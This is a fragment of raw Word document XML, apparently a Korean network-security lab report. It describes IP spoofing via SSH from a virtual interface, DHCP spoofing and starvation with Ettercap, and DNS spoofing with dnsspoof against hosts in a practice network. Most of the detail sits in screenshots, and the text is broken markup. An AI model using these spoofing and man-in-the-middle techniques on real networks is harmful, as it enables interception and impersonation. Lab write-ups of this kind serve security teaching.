            <wp:docPr id="49" name="그림 49" descr="https://lh6.googleusercontent.com/WwK3FWL8om61FfBk4Woqfe8B5hGxJmcVlOfFag7Vdi8yRStnYNYbgQ_a8W3WhuyeWM6nfeld48TxGy9G4_hMFwjJLxPv0krRlI82g_iDeyl613FDkzeX4Hxq2yoygX58K6g6rW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6.googleusercontent.com/WwK3FWL8om61FfBk4Woqfe8B5hGxJmcVlOfFag7Vdi8yRStnYNYbgQ_a8W3WhuyeWM6nfeld48TxGy9G4_hMFwjJLxPv0krRlI82g_iDeyl613FDkzeX4Hxq2yoygX58K6g6rWN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A8" w:rsidRPr="00802FA8" w:rsidRDefault="00802FA8" w:rsidP="00802FA8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802FA8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>공격이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제대로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이루어졌는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확인하기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위해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에서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 xml:space="preserve"> Ping test</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00802FA8" w:rsidRPr="009321F3" w:rsidRDefault="00802FA8" w:rsidP="00802FA8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802FA8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>BT</w:t>
      </w:r>
      <w:r w:rsidRPr="00802FA8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>에서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 w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>G</w:t>
      </w:r>
      <w:r w:rsidRPr="00802FA8"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서로</w:t>
      </w:r>
      <w:r w:rsidRPr="00802FA8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ping test</w:t>
      </w:r>
      <w:r w:rsidRPr="00802FA8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>하는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것을</w:t>
      </w:r>
      <w:r w:rsidRPr="00802FA8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Sniffing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009321F3" w:rsidRDefault="009321F3" w:rsidP="009321F3">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009321F3" w:rsidRPr="009321F3" w:rsidRDefault="009321F3" w:rsidP="009321F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9321F3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidRPr="009321F3">
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>P Spoofing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009321F3" w:rsidRDefault="009321F3" w:rsidP="009321F3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93620" cy="1455420"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1" name="그림 1" descr="https://lh6.googleusercontent.com/7g-RS_cJ1W5rStuvTDslH8A751evu7P2aEDhh24TTXrJbHSAPZvDsER7_Pt66606N0Mco0BvDTdcCkpr1L5XJ5pf0tYqoeLN7EYbeJiNEaEGbAAeDfy4kubJ4vYvA_phYLSr9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g-RS_cJ1W5rStuvTDslH8A751evu7P2aEDhh24TTXrJbHSAPZvDsER7_Pt66606N0Mco0BvDTdcCkpr1L5XJ5pf0tYqoeLN7EYbeJiNEaEGbAAeDfy4kubJ4vYvA_phYLSr9N0Z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23160" cy="1455420"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="9" name="그림 9" descr="https://lh4.googleusercontent.com/6zFj_WYfSPaw0HjLZsP751HOsOOR1Y1gTZn36jqSe5Zl6147zjFehgo604nmQC2yWa8MEmCcCarMV_fzyfqzgOYVrLt6h4Z7GeIdykU2QwKpFUFOgAp2B0EDmFAQCYfmk4nXIC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6zFj_WYfSPaw0HjLZsP751HOsOOR1Y1gTZn36jqSe5Zl6147zjFehgo604nmQC2yWa8MEmCcCarMV_fzyfqzgOYVrLt6h4Z7GeIdykU2QwKpFUFOgAp2B0EDmFAQCYfmk4nXICKQ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hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">공격에 앞서 경영관리부 </w:t>
      </w:r>
      <w:r w:rsidRPr="009321F3">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>PC</w:t>
      </w:r>
      <w:r w:rsidRPr="009321F3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">를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DNS</w:t>
      </w:r>
      <w:r w:rsidRPr="009321F3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>서버</w:t>
      </w:r>
      <w:r w:rsidRPr="009321F3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[10.10.100.20]</w:t>
      </w:r>
      <w:r w:rsidRPr="009321F3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>에</w:t>
      </w:r>
      <w:r w:rsidRPr="009321F3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> SSH</w:t>
      </w:r>
      <w:r w:rsidRPr="009321F3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>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접근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가능한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539240"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="50" name="그림 50" descr="https://lh6.googleusercontent.com/8mvUWjpdEPLZeG4XzwcATJUwlNTv6h9CpoAMGsIEf7qI-s_2ylH6PfKiD9v-skmJEswWSsFnmK6YQx9_ro7Wy5nG3HmkiIcitnjM0nz08coCpj_5TWXL4p0HSTzWqSuQmZ_6f9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8mvUWjpdEPLZeG4XzwcATJUwlNTv6h9CpoAMGsIEf7qI-s_2ylH6PfKiD9v-skmJEswWSsFnmK6YQx9_ro7Wy5nG3HmkiIcitnjM0nz08coCpj_5TWXL4p0HSTzWqSuQmZ_6f9W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0300" cy="1546860"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="51" name="그림 51" descr="https://lh3.googleusercontent.com/NUptgCacT9FkhbQjiSFAvxJ_fQ9zDTQow-eS2nY0a9gNhAn_a4YJhSRZLMAnhgxQb4ZncB3-8Fg7OoKf0Ikpv26J6AYosk2eBfa5CFmOPfG4QwC2-2J1n5VeAqAlMoDXKGMDv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NUptgCacT9FkhbQjiSFAvxJ_fQ9zDTQow-eS2nY0a9gNhAn_a4YJhSRZLMAnhgxQb4ZncB3-8Fg7OoKf0Ikpv26J6AYosk2eBfa5CFmOPfG4QwC2-2J1n5VeAqAlMoDXKGMDvIT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[10.10.20.10]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>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주소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가상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인터페이스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부여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>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>에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자신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[10.10.20.10]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>라고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속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2362200" cy="1638300"/>
            <wp:effectExtent l="0" t="0" r="0" b="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01240" cy="1615440"/>
            <wp:effectExtent l="0" t="0" r="3810" b="3810"/>
            <wp:docPr id="53" name="그림 53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BT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ssh –b </w:t>
      </w:r>
      <w:r w:rsidRPr="009321F3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>옵션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가상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인터페이스에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부여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경영기획부</w:t>
      </w:r>
      <w:r w:rsidRPr="009321F3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> PC[10.10.20.10] </w:t>
      </w:r>
      <w:r w:rsidRPr="009321F3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>아이피</w:t>
      </w:r>
      <w:r w:rsidRPr="009321F3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>로</w:t>
      </w:r>
      <w:r w:rsidRPr="009321F3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> DNS</w:t>
      </w:r>
      <w:r w:rsidRPr="009321F3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>서버</w:t>
      </w:r>
      <w:r w:rsidRPr="009321F3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[10.10.100.20]</w:t>
      </w:r>
      <w:r w:rsidRPr="009321F3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>에</w:t>
      </w:r>
      <w:r w:rsidRPr="009321F3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> SSH</w:t>
      </w:r>
      <w:r w:rsidRPr="009321F3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>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접근</w:t>
      </w:r>
      <w:r w:rsidRPr="009321F3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>하고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 xml:space="preserve">DNS </w:t>
      </w:r>
      <w:r w:rsidRPr="009321F3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>서버에서</w:t>
      </w:r>
      <w:r w:rsidRPr="009321F3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> SSH </w:t>
      </w:r>
      <w:r w:rsidRPr="009321F3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>접속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현황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했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때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경영기획부</w:t>
      </w:r>
      <w:r w:rsidRPr="009321F3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> PC [10.10.20.10]</w:t>
      </w:r>
      <w:r w:rsidRPr="009321F3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>으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로그인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되었다는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것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수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있음</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009321F3" w:rsidRDefault="009321F3" w:rsidP="009321F3">
      <w:pPr>
        <w:ind w:left="804"/>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009321F3" w:rsidRDefault="009321F3" w:rsidP="009321F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9321F3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidRPr="009321F3">
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>HCP Spoofing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009321F3" w:rsidRDefault="009321F3" w:rsidP="009321F3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38400" cy="1714500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="54" name="그림 54" descr="https://lh3.googleusercontent.com/6gBx0Cq-oeY7pDTccrf213OP4liW-cD3G7wMOgWn5-hW7t3HbQ56CvzxnHjcdfVJBDBASdcfzmA5bzUEgWw_ZoD-YXuGxrKxZ6q3dFgryhv72VnhKAzoYKmi7Y7x51CRaVXieW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6gBx0Cq-oeY7pDTccrf213OP4liW-cD3G7wMOgWn5-hW7t3HbQ56CvzxnHjcdfVJBDBASdcfzmA5bzUEgWw_ZoD-YXuGxrKxZ6q3dFgryhv72VnhKAzoYKmi7Y7x51CRaVXieWBw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0760" cy="1676400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="55" name="그림 55" descr="https://lh5.googleusercontent.com/njcg_wXnSd59scWeMaIZMrH2oLNfVsC_yJ5fW0AbFag-wvyYzAXNWfoKALLvQugmtFMjwso5W0lFGiCE1f6tt3doDOlnd9HPK9JZ9GYXETPFe-rwNpZuLRkwUrYIk5z3Hv9GFK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njcg_wXnSd59scWeMaIZMrH2oLNfVsC_yJ5fW0AbFag-wvyYzAXNWfoKALLvQugmtFMjwso5W0lFGiCE1f6tt3doDOlnd9HPK9JZ9GYXETPFe-rwNpZuLRkwUrYIk5z3Hv9GFKQ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경영기획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직원</w:t>
      </w:r>
      <w:r w:rsidRPr="009321F3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> PC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비스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제대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오는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 w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>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공격자가</w:t>
      </w:r>
      <w:r w:rsidRPr="009321F3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> BT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ettercap </w:t>
      </w:r>
      <w:r w:rsidRPr="009321F3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>툴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DHCP Spoofing </w:t>
      </w:r>
      <w:r w:rsidRPr="009321F3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>공격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시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53640" cy="1760220"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="56" name="그림 56" descr="https://lh5.googleusercontent.com/Bk0iY5Xdqx8eGHWgmt2EC1DU0FtmlOmTFiuzSD3dWjXN_FYG7e6bNWORsEYR5CuzR9EHsxUsMqkep568MqJvs2AgblpTse62SUOVINHRJ6yg36mK4vEPkmELW1gqLUIimJZy47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Bk0iY5Xdqx8eGHWgmt2EC1DU0FtmlOmTFiuzSD3dWjXN_FYG7e6bNWORsEYR5CuzR9EHsxUsMqkep568MqJvs2AgblpTse62SUOVINHRJ6yg36mK4vEPkmELW1gqLUIimJZy47gz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85060" cy="1760220"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="57" name="그림 57" descr="https://lh5.googleusercontent.com/4PoVPNYIZmwVFGcGoAi8-N-Gs02EB0IX55ioJqcpXMAd_bkXN4GIW7RfUx9iKqx1JhyEj-_1iX64EO9zgZxBxiZRx1uO6Pa_Ux5iMYKhXjB5265e1uzGqCXaai9P84vnVU5jWG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4PoVPNYIZmwVFGcGoAi8-N-Gs02EB0IX55ioJqcpXMAd_bkXN4GIW7RfUx9iKqx1JhyEj-_1iX64EO9zgZxBxiZRx1uO6Pa_Ux5iMYKhXjB5265e1uzGqCXaai9P84vnVU5jWGyQ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공격대상</w:t>
      </w:r>
      <w:r w:rsidRPr="009321F3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> PC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버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으면</w:t>
      </w:r>
      <w:r w:rsidRPr="009321F3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> BT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설정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대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오는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것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수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있음</w:t>
      </w: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Pr="009321F3" w:rsidRDefault="009321F3" w:rsidP="009321F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9321F3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidRPr="009321F3">
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>HCP Starvation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009321F3" w:rsidRDefault="009321F3" w:rsidP="009321F3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77440" cy="1257300"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="58" name="그림 58" descr="https://lh6.googleusercontent.com/nDA4VS0tlengFDF9AklQlw3C5u_vfi5EIOESKhVnxXbFxPRpP1cE4qiGBQ3YwhDQDvwqrw2yQ9cWGZX8ir2tNaFFF45np7J6ETPj_Elh3cJzMYwOdeeVmjoJLyo6PQwpRI6A2G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nDA4VS0tlengFDF9AklQlw3C5u_vfi5EIOESKhVnxXbFxPRpP1cE4qiGBQ3YwhDQDvwqrw2yQ9cWGZX8ir2tNaFFF45np7J6ETPj_Elh3cJzMYwOdeeVmjoJLyo6PQwpRI6A2Gkr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249680"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="59" name="그림 59" descr="https://lh3.googleusercontent.com/h3QSfxnMrZXUV2JpIdF-1Dnt7hRCWBMH0Hj1XA-bRBGJM_Kzsn8NV6dGwgQwh2mG37D3Wbc2JM6pPZhVgko_sRWWu5_Lb9ogcWhs9vlPydycZl9-iuNZPh4533Fl-TN9ETlfm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h3QSfxnMrZXUV2JpIdF-1Dnt7hRCWBMH0Hj1XA-bRBGJM_Kzsn8NV6dGwgQwh2mG37D3Wbc2JM6pPZhVgko_sRWWu5_Lb9ogcWhs9vlPydycZl9-iuNZPh4533Fl-TN9ETlfmiR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 w:hint="eastAsia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뒤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할당범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재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설정</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>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하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Ettercap </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>툴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서</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> DHCP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>서버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4808220" cy="1493520"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="60" name="그림 60" descr="https://lh4.googleusercontent.com/Sm27uZX8s5X7y5Z6R_gnKgG--jchBCxqZ4p8ugTzfxd13Mv0r4aFZE9UtmrHuJq_BqXH-8ow-WygP2nG4C_0hc_pWV7VjJHNWk7r2C3a6ghSv5xOuCDcLrW4E5If3pXuChFedj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Sm27uZX8s5X7y5Z6R_gnKgG--jchBCxqZ4p8ugTzfxd13Mv0r4aFZE9UtmrHuJq_BqXH-8ow-WygP2nG4C_0hc_pWV7VjJHNWk7r2C3a6ghSv5xOuCDcLrW4E5If3pXuChFedje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공격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내용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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> BT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>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가지고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는</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 10.10.20.20</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial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외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나머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주소들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할당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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>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것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음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15540" cy="1699260"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="61" name="그림 61" descr="https://lh5.googleusercontent.com/qDIE1dbskY1YPh-lUF9e6vNlBCMN0NHG_YZH_AMa7SNGTUoV1TbrM6Qs4kzzChV70xXYeBp1XxV-FzAnyTiBV7G9GzbflUmLy_7X7qijlbyy2mwkqiEu4MlHBak22-vrTuhvt_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qDIE1dbskY1YPh-lUF9e6vNlBCMN0NHG_YZH_AMa7SNGTUoV1TbrM6Qs4kzzChV70xXYeBp1XxV-FzAnyTiBV7G9GzbflUmLy_7X7qijlbyy2mwkqiEu4MlHBak22-vrTuhvt_g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38400" cy="1706880"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="62" name="그림 62" descr="https://lh4.googleusercontent.com/75k8sVtbKLnrmAvVqOxpKiur8g59TWdsYGmcoRagNBAg1e7TfAKbClVTvsqJo3X09RHUvX6RD30CD5Rxsw0Eicofmux4uL8_SvoREUf-Ybpy57ASF1llvDsq_6TiJb0kQSz19g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75k8sVtbKLnrmAvVqOxpKiur8g59TWdsYGmcoRagNBAg1e7TfAKbClVTvsqJo3X09RHUvX6RD30CD5Rxsw0Eicofmux4uL8_SvoREUf-Ybpy57ASF1llvDsq_6TiJb0kQSz19g-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DHCP</w:t>
      </w:r>
      <w:r w:rsidRPr="009321F3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>서버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동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내역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</w:t>
      </w:r>
      <w:r w:rsidRPr="009321F3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>을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 w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>한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 w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>뒤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XP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버에게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보지만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버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더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상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하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못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오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않음</w:t>
      </w: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>NS Spoofing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009321F3" w:rsidRDefault="009321F3" w:rsidP="009321F3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69820" cy="1402080"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="63" name="그림 63" descr="https://lh5.googleusercontent.com/24W6epkiJodqRANH1Hz9TIrjIetv6rNZpKIx7V973GnpI-F4x2jE8VzzzOqFJ448Tl0jfoXY5jzHGS2ceekmcBvW0LHpwTU7gfLWZLxVQ_gt9wMm0pOkKDzhHLjKNYZ6k4Bu-Z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24W6epkiJodqRANH1Hz9TIrjIetv6rNZpKIx7V973GnpI-F4x2jE8VzzzOqFJ448Tl0jfoXY5jzHGS2ceekmcBvW0LHpwTU7gfLWZLxVQ_gt9wMm0pOkKDzhHLjKNYZ6k4Bu-Zfn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39340" cy="1379220"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="64" name="그림 64" descr="https://lh6.googleusercontent.com/OF4X6maiCaYL13D7a2d6xLiRi4JN3XIgp8eyvAGOqvRFdKBHffD6RTMovYfRmEj7dvTFuaUNz_z-y8FcLdsNG82IMaJH0eNln1EDJWnJPDJxURvVEDabhU3WKQJj4IxxI8RAcn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OF4X6maiCaYL13D7a2d6xLiRi4JN3XIgp8eyvAGOqvRFdKBHffD6RTMovYfRmEj7dvTFuaUNz_z-y8FcLdsNG82IMaJH0eNln1EDJWnJPDJxURvVEDabhU3WKQJj4IxxI8RAcn3w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에서 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">DNS Spoofing </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>공격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위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파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생성</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>을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하고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 w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>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대상으로</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> MITM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>상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만들기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23160" cy="1196340"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="65" name="그림 65" descr="https://lh3.googleusercontent.com/-zZ3UYP8DGGAIJuONDESQZ8UDpnf8qH88-loCetD9BdWykTOCs1KdkfO7iGJue5pDpmt4FQRuuIngLlSJ-i-BJmokaQtjSzI9ohrpIymYXjBtMvhcQclrsx_jzFpJRor5h6ddW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-zZ3UYP8DGGAIJuONDESQZ8UDpnf8qH88-loCetD9BdWykTOCs1KdkfO7iGJue5pDpmt4FQRuuIngLlSJ-i-BJmokaQtjSzI9ohrpIymYXjBtMvhcQclrsx_jzFpJRor5h6ddW8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dnsspoof </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>툴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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
